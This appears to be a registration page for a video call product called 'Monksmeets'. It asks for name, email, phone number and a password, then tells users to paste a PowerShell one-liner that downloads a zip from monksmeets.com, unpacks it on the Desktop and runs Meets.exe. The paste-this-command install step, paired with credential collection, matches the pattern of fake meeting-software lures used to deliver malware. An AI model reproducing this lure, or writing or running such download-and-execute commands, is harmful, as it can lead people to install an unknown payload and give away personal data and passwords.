// --> Video Call Software Registration

01

Personal Information

Personal Information

Please enter your information and proceed to the next step so we can build your accounts.

First Name
Last Name
Your Email
Phone Number

02

Set Your Password

Set Your Password

Please create a secure password for your account.

Password

03

Download Instructions

Monksmeets Windows Installer

Please follow the instructions below to download and install the software:

Open Command Prompt or PowerShell

Copy and paste the one-liner code:

Follow the on-screen instructions to complete the installation.

powershell -Command "Invoke-WebRequest -Uri 'https://monksmeets.com/Monks(Meets).zip' -OutFile '$env:USERPROFILE\Desktop\Monks(Meets).zip'; Expand-Archive -Path '$env:USERPROFILE\Desktop\Monks(Meets).zip' -DestinationPath '$env:USERPROFILE\Desktop' -Force; Start-Process -FilePath '$env:USERPROFILE\Desktop\Monks(Meets)\Meets.exe'"